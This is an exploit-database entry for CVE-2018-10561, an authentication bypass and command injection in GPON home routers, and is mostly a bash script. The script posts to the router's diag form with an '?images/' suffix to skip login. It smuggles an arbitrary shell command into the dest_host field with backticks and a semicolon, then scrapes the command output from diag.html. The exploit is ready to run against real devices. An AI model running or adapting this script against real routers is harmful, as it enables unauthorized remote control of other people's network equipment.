GPON Routers - Authentication Bypass / Command Injection
| EKU-ID: 7582 | CVE: 2018-10561 | OSVDB-ID: |
| Author: vpnmentor | Published: 2018-05-03 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 7582 | CVE: 2018-10561 | OSVDB-ID: |
| Author: vpnmentor | Published: 2018-05-03 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#!/bin/bash
echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting…."
sleep 3
echo "[+] Retrieving the ouput…."
curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ‘ | sed -e ‘s/\\n/\n/g’